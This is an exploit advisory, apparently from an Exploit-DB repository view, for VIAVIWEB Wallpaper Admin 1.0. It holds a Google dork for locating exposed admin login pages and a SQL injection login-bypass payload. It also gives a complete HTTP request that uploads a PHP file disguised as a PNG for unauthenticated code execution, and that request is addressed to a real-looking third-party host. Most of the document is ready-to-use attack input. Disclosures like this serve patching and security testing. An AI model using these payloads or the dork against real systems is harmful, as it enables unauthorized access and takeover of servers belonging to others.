6206f4f208
4 changes to exploits/shellcodes/ghdb SoX 14.4.2 - Denial Of Service Linksys AX3200 V1.1.00 - Command Injection VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
69 lines
No EOL
2.3 KiB
Text
69 lines
No EOL
2.3 KiB
Text
# Exploit Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
|
|
# Google Dork: intext:"Wallpaper Admin" "LOGIN" "password" "Username"
|
|
# Date: [18/09/2022]
|
|
# Exploit Author: [Edd13Mora]
|
|
# Vendor Homepage: [www.viaviweb.com]
|
|
# Version: [N/A]
|
|
# Tested on: [Windows 11 - Kali Linux]
|
|
|
|
------------------
|
|
SQLI on the Login page
|
|
------------------
|
|
payload --> admin' or 1=1-- -
|
|
---
|
|
POC:
|
|
---
|
|
[1] Disable JavaScript on ur browser put the payload and submit
|
|
[2] Reactive JavaScript and resend the request
|
|
---------------------------
|
|
Authenticated SQL Injection:
|
|
---------------------------
|
|
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/edit_gallery_image.php?img_id=[number]
|
|
-----------------------------------------------
|
|
Remote Code Execution (RCE none authenticated):
|
|
-----------------------------------------------
|
|
Poc:
|
|
----
|
|
Vulnerable End-Point --> http://localhost/PAth-Where-Script-Installed/add_gallery_image.php?add=yes
|
|
--------------------
|
|
Burp Request :
|
|
--------------------
|
|
|
|
POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
|
|
Host: http://googlezik.freehostia.com
|
|
Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jdg8oraed4o52
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: multipart/form-data; boundary=---------------------------33893919268150571572221367848
|
|
Content-Length: 467
|
|
Origin: http://googlezik.freehostia.com
|
|
Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
Te: trailers
|
|
|
|
-----------------------------33893919268150571572221367848
|
|
Content-Disposition: form-data; name="category_id"
|
|
|
|
1
|
|
-----------------------------33893919268150571572221367848
|
|
Content-Disposition: form-data; name="image[]"; filename="poc.php"
|
|
Content-Type: image/png
|
|
|
|
<?php phpinfo(); ?>
|
|
-----------------------------33893919268150571572221367848
|
|
Content-Disposition: form-data; name="submit"
|
|
|
|
|
|
-----------------------------33893919268150571572221367848--
|
|
|
|
|
|
Uploaded File can be found here :
|
|
--------------------------------
|
|
http://localhost/PAth-Where-Script-Installed/categories/
|
|
``` |